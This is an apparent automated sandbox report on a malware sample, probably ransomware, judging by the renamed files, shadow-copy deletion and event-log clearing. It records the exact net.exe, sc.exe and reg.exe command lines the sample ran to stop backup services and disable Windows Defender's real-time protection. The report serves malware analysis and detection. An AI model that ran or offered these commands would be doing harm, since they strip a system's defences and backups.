Analysis Overview
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
Threat Level: Known bad
The file cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Runs net.exe
Modifies registry class
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 10:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 10:58
Reported
2022-01-13 11:04
Platform
win7-en-20211208
Max time kernel
25s
Max time network
17s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\readme.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_isRhzZd1dmQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\InkWatson.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\adovbs.inc | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\va.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_HqyNaeRYRls0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InkWatson.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_wllXAL4Z8k00.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Eurosti.TTF | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\micaut.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_L_rm1aJV7ho0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\micaut.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado27.tlb | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ta.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_PYXqwCqVp4g0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_Lt4HTXk86wc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_PVkGWc8BZi00.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_Kssss1rRWcA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\en.ttt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_APEUeiuiXZI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_7Sf32L4R0Zw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado21.tlb | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_kTY8ud0ZvnY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
